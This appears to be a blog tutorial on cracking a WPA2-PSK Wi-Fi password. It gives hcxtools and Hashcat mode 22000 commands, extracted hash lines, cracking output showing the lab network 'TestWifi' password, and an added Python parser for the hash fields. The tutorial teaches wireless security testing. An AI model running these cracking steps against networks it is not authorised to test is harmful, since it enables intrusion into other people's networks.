
Cracking WPA2-PSK with Hashcat

This post covers how to crack Wi-Fi passwords with Hashcat from handshakes captured using a tool like airmon-ng.

  1. Install hcxtools
  2. Extract Hashes
  3. Crack with Hashcat

Install hcxtools

To start off we need a tool called hcxtools. If it is not already installed on your Kali machine, you can install it using:

apt install hcxtools

Extract Hashes

Next we need to extract the required data and convert it to a format Hashcat can understand:

hcxpcapngtool wifiCapture-01.cap -o /home/user1/wifiHashes.txt
  • -o specifies the output file for the extracted data.

hcxpcapngtool 6.2.5 reading from wifiCapture-01.cap...

summary capture file
--------------------
file name................................: wifiCapture-01.cap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 05.02.2022 23:48:32

...

EAPOL M32E2 (authorized).................: 1
PMKID (total)............................: 2
PMKID (best).............................: 1
PMKID written to combi hash file.........: 1


session summary
---------------
processed cap files...................: 1

The output in the wifiHashes.txt file can now be fed into Hashcat:

WPA*01*b0f5e0b8617ab00c85f135ebaca7a865*112233445566*224466883355*5465737457696669***
WPA*02*96faaa6f7fe58a537433d88754cd8e65*112233445566*224466883355*5465737457696669*60...b0*0103....00*a2
  • Line 2 has been shortened
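
Added example, not from the original post: a small Python parser for the hash lines above. It decodes the hex ESSID and MAC fields so you can see which network and hash type each line in wifiHashes.txt belongs to. The field names follow the hashcat mode 22000 layout, and the EAPOL sample line is constructed because the post's own line is shortened.

```python
from collections import defaultdict

# Mode 22000 line layout (fields separated by "*"):
# WPA*TYPE*PMKID_or_MIC*MAC_AP*MAC_CLIENT*ESSID_hex*NONCE_AP*EAPOL_CLIENT*MESSAGEPAIR
KINDS = {"01": "PMKID", "02": "EAPOL"}

def fmt_mac(field):
    """Validate a 12-hex-digit MAC field and return it colon-separated."""
    if len(field) != 12:
        raise ValueError(f"bad MAC field: {field!r}")
    return bytes.fromhex(field).hex(":")

def parse_22000_line(line):
    """Decode one hash line into a dict of human-readable fields."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in KINDS:
        raise ValueError("not a mode 22000 hash line")
    if len(bytes.fromhex(f[2])) != 16:
        raise ValueError("PMKID/MIC must be 16 bytes")
    essid = bytes.fromhex(f[5])
    if not 1 <= len(essid) <= 32:
        raise ValueError("ESSID must be 1-32 bytes")
    if f[1] == "02" and (len(bytes.fromhex(f[6])) != 32 or not f[7]):
        raise ValueError("EAPOL line needs a 32-byte AP nonce and an EAPOL frame")
    return {"kind": KINDS[f[1]], "digest": f[2],
            "ap_mac": fmt_mac(f[3]), "client_mac": fmt_mac(f[4]),
            "essid": essid.decode("utf-8", errors="replace")}

def summarize(lines):
    """Map (ESSID, AP MAC) -> sorted hash kinds found for that network."""
    seen = defaultdict(set)
    for line in lines:
        if line.strip():
            rec = parse_22000_line(line)
            seen[(rec["essid"], rec["ap_mac"])].add(rec["kind"])
    return {net: sorted(kinds) for net, kinds in seen.items()}

# First line is the PMKID line shown in the post; the second is CONSTRUCTED
# (dummy MIC, nonce and frame bytes) because the post's EAPOL line is shortened.
PAGE_PMKID = ("WPA*01*b0f5e0b8617ab00c85f135ebaca7a865*112233445566*"
              "224466883355*5465737457696669***")
CONSTRUCTED_EAPOL = ("WPA*02*" + "aa" * 16 + "*112233445566*224466883355*"
                     "5465737457696669*" + "bb" * 32 + "*0103005f*02")

if __name__ == "__main__":
    for net, kinds in summarize([PAGE_PMKID, CONSTRUCTED_EAPOL]).items():
        print(net, kinds)
```

The ESSID field is only hex-encoded, not hashed, so `5465737457696669` decodes straight to the network name `TestWifi` that appears in the cracked output.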

Crack with Hashcat

With the above output file we can now use Hashcat (mode 22000) to crack the password much faster:

PS U:\Hashcat> .\hashcat.exe -m 22000 -w 3 .\toCrack\wifiHashes.txt .\passwordLists\hashkiller-dict.txt
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: .\toCrack\wifiHashes.txt
Time.Started.....: Sat Feb 05 23:58:37 2022 (3 mins, 26 secs)
Time.Estimated...: Sun Feb 06 00:09:37 2022 (7 mins, 34 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\passwordLists\hashkiller-dict.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   367.7 kH/s (78.55ms) @ Accel:64 Loops:512 Thr:128 Vec:1
Recovered........: 2/4 (50.00%) Digests
Progress.........: 87767490/254902169 (34.43%)
Rejected.........: 12007874/87767490 (13.68%)
Restore.Point....: 87724815/254902169 (34.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1536-2048
Candidate.Engine.: Device Generator
Candidates.#1....: leo31639 -> solyhe03
Hardware.Mon.#1..: Temp: 64c Fan: 32% Util: 87% Core:1888MHz Mem:6794MHz Bus:16

b0f5e0b8617ab00c85f135ebaca7a865:112233445566:224466883355:TestWifi:Password$123
96faaa6f7fe58a537433d88754cd8e65:112233445566:224466883355:TestWifi:Password$123

The attack was successful and we found out the Wi-Fi password was Password$123.

This post is licensed under CC BY 4.0 by the author.